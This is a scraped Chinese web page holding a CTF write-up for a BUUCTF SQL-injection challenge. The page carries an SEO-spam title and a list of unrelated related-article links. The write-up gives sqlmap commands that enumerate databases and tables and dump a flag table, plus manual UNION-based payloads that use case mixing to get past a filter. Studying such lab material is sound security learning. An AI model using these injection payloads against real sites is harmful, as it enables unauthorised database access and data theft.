当前位置: 首页 > news >正文

企业网站外包建设seo交流

news 2025/10/20 14:25:37
企业网站外包建设,seo交流,网站建设与管理大纲,mvc做网站用的多不多题目: 发现id处可以sql注入: 虽然输入id1;show databases;#没什么回显,但是知道这里是字符型注入了 这次利用sqlmap注入 --dbs:列出所有数据库名字 python .\sqlmap.py -u http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.…

题目:

发现id处可以sql注入:

虽然输入id=1';show databases;#没什么回显,但是知道这里是字符型注入了

这次利用sqlmap注入

--dbs:列出所有数据库名字
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' --dbs

--current-db:当前数据库
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' --current-db

显示表名
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' -D 'ctf' --tables

--dump:显示文段内容
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' -D 'ctf' -T 'here_is_flag' --dump

 其他手动SQL注入方法

利用大小写绕过

/?id=1' Order by 5 --+
/?id=1' Union SELect 1,version(),user(),database(),5  --+

?id=' uNion Select 1,2,3,4,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA= 'ctf'--+
?id=0' uNion Select 1,2,3,4,flag FROM ctf.here_is_flag--+
http://www.dtcms.com/a/504647.html

相关文章:

  • 广东建泰建设有限公司网站找建设网站公司吗
  • 响应式布局模板网站免费下载wordpress连接谷歌
  • 东莞市网站建设服务机构做miui主题网站
  • spring从入门到精通(spring学习笔记,持续更新中)
  • 32HAL——蓝牙BT24模块
  • 广州知名的网站建设公司网站管理过程
  • 大同网站建设易企秀在线制作免费
  • 接口测试与接口自动化测试面试题+回答汇总
  • 大型网站的制作合肥网站建设优化学习
  • 学校做网站及费用wordpress侧边菜单栏
  • 【Java】内部类
  • 公司网站建设费用科目深圳建设工程质量协会网站
  • 怎样注册网站建立网页电商数据分析师
  • 玉雕网站建设全球可以做外贸的社交网站有哪些
  • linux 系统有哪些以及Ubuntu安装
  • 设备健康管理大数据平台:从数据治理到智能决策的全链路技术实现
  • 开发企业网站多少钱重庆建筑信息工程官网
  • Flutter 学习资源及视频
  • 建网站的方法wordpress新浪微博
  • 接口测试的流程
  • 给人做网站能赚钱吗网站试用模块
  • 深圳做营销网站的公司大型物流公司网站
  • AI 食用指南--更好的用AI编程
  • 红蓝眼睛谜题
  • 电子邮件协议
  • 做全网营销型网站建设智慧景区网站建设
  • 餐饮网站建设有什么好处哪个公司的app开发
  • 网站建设管理自查报告网站的色调
  • 金山词霸2024已经复活
  • 山东圣大建设集团网站温州网站优化定制